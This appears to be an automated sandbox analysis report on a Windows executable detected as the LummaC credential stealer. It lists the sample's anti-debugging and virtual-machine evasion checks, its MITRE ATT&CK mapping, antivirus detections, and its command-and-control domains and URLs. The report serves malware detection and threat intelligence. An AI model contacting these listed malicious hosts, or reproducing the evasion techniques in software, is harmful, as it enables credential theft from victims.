    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0DE1 second address: 4AE0E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7648CE84F9h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E0C second address: 4AE0E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E12 second address: 4AE0E2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E2A second address: 4AE0E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E47 second address: 4AE0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0E4D second address: 4AE0EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F764878257Dh 0x0000000e jmp 00007F764878255Fh 0x00000013 add eax, ecx 0x00000015 jmp 00007F7648782566h 0x0000001a mov eax, dword ptr [eax+00000860h] 0x00000020 jmp 00007F7648782560h 0x00000025 test eax, eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F764878255Eh 0x0000002e and ch, FFFFFFD8h 0x00000031 jmp 00007F764878255Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 movzx eax, bx 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0EBE second address: 4AE0F00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F76B9DFE380h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F7648CE84F9h 0x00000016 adc esi, 3D706F26h 0x0000001c jmp 00007F7648CE84F1h 0x00000021 popfd 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B003E7 second address: 4B0040D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 1096h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7648782566h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0040D second address: 4B00411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00411 second address: 4B00417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00417 second address: 4B0041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0041D second address: 4B00421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00421 second address: 4B00425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00425 second address: 4B0044D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov dx, cx 0x0000000d mov edx, ecx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7648782562h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0044D second address: 4B00451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00451 second address: 4B00457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00457 second address: 4B00477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7648CE84ECh 0x00000008 mov eax, 2EC23451h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx ecx, dx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0049E second address: 4B004B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, E887h 0x00000007 movzx ecx, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 mov si, di 0x00000017 popad 0x00000018 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3A3D7E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 545A77 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 550C0E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3A3CB2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D364B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 2368Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.drBinary or memory string: VMware
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000002.1972650341.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000D82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003800D0 LdrInitializeThunk,0_2_003800D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: LProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe34%ReversingLabsWin32.Infostealer.Tinba
    file.exe43%VirustotalBrowse
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://sergei-esenin.com/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/scriptacul0%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://sergei-esenin.com:443/api19%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
    https://steamcommunity.com/profiles/765610%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://sergei-esenin.com/k8%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://steamcommunity.com/?subsection0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://sergei-esenin.com/apiF0%VirustotalBrowse
    https://steamcommunity.com/N0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e0%VirustotalBrowse
    https://dissapoiznw.store:443/api22%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrueunknown
    sergei-esenin.com
    		172.67.206.204
    		truetrueunknown
    eaglepawnoy.store
    		unknown
    		unknowntrueunknown
    bathdoomgaz.store
    		unknown
    		unknowntrueunknown
    spirittunek.store
    		unknown
    		unknowntrueunknown
    licendfilteo.site
    		unknown
    		unknowntrueunknown
    studennotediw.store
    		unknown
    		unknowntrueunknown
    mobbipenju.store
    		unknown
    		unknowntrueunknown
    clearancek.site
    		unknown
    		unknowntrueunknown
    dissapoiznw.store
    		unknown
    		unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    studennotediw.storetrueunknown
    dissapoiznw.storetrueunknown
    https://steamcommunity.com/profiles/76561199724331900true
    • URL Reputation: malware
    		unknown
    eaglepawnoy.storetrueunknown
    bathdoomgaz.storetrueunknown
    clearancek.sitetrue
      		unknown
      spirittunek.storetrue
        		unknown
        licendfilteo.sitetrue
          		unknown
          mobbipenju.storetrue
            		unknown
            https://sergei-esenin.com/apitrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1808609124.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972650341.0000000000D53000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://sergei-esenin.com/file.exe, 00000000.00000002.1972941186.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000D82000.00000004.00000020.00020000.00000000.sdmptrueunknown
              https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/javascript/scriptaculfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/)file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
